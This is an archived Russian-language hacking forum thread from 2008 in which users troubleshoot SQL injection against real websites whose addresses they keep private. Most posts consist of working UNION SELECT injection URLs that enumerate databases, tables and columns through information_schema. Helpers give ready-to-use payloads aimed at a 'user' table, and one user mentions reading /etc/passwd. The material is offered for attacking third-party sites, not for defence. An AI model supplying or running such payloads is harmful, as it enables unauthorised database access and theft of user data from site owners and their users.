ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.11.2008, 22:41
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от d1aVOL
можно ли как-нибудь кроме брута узнать названия столбцов/таблиц, если версия муслуля менше 5?
нет
|
|
|
27.11.2008, 01:22
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
есть небольшая загвоздка) понять почему так не могу((
на сайте sql inj. данные из одного запроса вставляются в другой но суть не в этом вроде... есть файл_прив /etc/passwd читает но файл из директории ниже не хочет читать(( хотя он точно есть)может он слишком большой?и еси так то что можна сделать?
|
|
|
|
27.11.2008, 02:10
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Сообщение от j0ker13
есть небольшая загвоздка) понять почему так не могу((
на сайте sql inj. данные из одного запроса вставляются в другой но суть не в этом вроде... есть файл_прив /etc/passwd читает но файл из директории ниже не хочет читать(( хотя он точно есть)может он слишком большой?и еси так то что можна сделать?
у тебя нехватает прав для его просмотра. Для примера
Он есть, но прочитать ты его не сможешь 
|
|
|
|
27.11.2008, 06:49
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Всем привет!
Разъясните...
Есть скуля - information_schema - доступно.
далее:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_name,0x3a,column_n ame)4,5,6,7,8+from+information_schema.columns--
вываливаются куча всего и там я выцепляю routines:sql_admin
далее:
http://site.com/non.php?id=-6+union+select+1,2,sql.admin,4,5,6,7,8+from+routin es--
ошибка:
Table 'db.routines' doesn't exist
ага, значит все в другой базе.
далее смотрю в какой именно базе:
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
отображается "information_schema"
подставляю:
http://site.com/non.php?id=-6+union+select+1,2,sql_admin,4,5,6,7,8+from+inform ation_schema.routines--
Страница без ошибок обновляется, но ни какой инфы нет.
Тут меня терзают сомнения:
1. Корректно ли я указал "information_schema.routines"
2. Может быть у меня не хватает прав?
3. Или где-то накосячил изначально?
Спасибо! |
|
|
|
27.11.2008, 06:58
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Хотелось бы ссылочку на сайт.
|
|
|
|
27.11.2008, 07:07
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Сообщение от R1dex
Хотелось бы ссылочку на сайт.
Не хотел бы разглашать )))) ну, сам понимаешь ...
|
|
|
|
27.11.2008, 07:09
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
отображается "information_schema"
мм.. даже не знаю что сказать .. даже не сталкивался ..
попробуй это
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'+limit+1,1--
также
[QUOTE]http://site.com/non.php?id=-6+union+select+1,concat(table_schema,0x2e,table_na me,0x3a,column_name),3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
и скажи тут результ..
|
|
|
|
27.11.2008, 07:29
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Сообщение от 159932
http://site.com/non.php?id=-6+union+select+1,table_schema,3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'+limit+1,1--
также
http://site.com/non.php?id=-6+union+select+1,concat(table_schema,0x2e,table_na me,0x3a,column_name),3,4,5,6,7,8,9,10,11, 1 2,13,14,15+from+information_schema.columns+where+t able_name='routines'--
и скажи тут результ..
по первому запросу - так же пусто, ни какой информации не выводит.
а по второму вот:
information_schema.ROUTINES:SQL_ADMIN
В принципе то же самое что и в моем случае, только дальше, делаю запрос, опять пусто.
НиПоНяТнО ( голосом Реввы)
|
|
|
|
27.11.2008, 07:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
дай ссыль в личку
|
|
|
|
27.11.2008, 09:11
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Сообщение от Octave_Parango
Всем привет!
Разъясните...
Есть скуля - information_schema - доступно.
далее:
вываливаются куча всего и там я выцепляю routines:sql_admin
далее:
ошибка:
Table 'db.routines' doesn't exist
ага, значит все в другой базе.
далее смотрю в какой именно базе:
отображается "information_schema"
подставляю:
Страница без ошибок обновляется, но ни какой инфы нет.
Тут меня терзают сомнения:
1. Корректно ли я указал "information_schema.routines"
2. Может быть у меня не хватает прав?
3. Или где-то накосячил изначально?
Спасибо!
Да ты ж синтаксиса sql команд не понимаешь!!! Доки читай по мускулу! хеккеры млин...
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
Код:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),table_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables--
потом уже смотришь названия колонок в интересующей таблице:
Код:
http://site.com/non.php?id=-6+union+select+1,2,COLUMN_NAME,4,5,6,7,8+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME="user"--
А уже потом на основе этих данных составляешь запрос!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
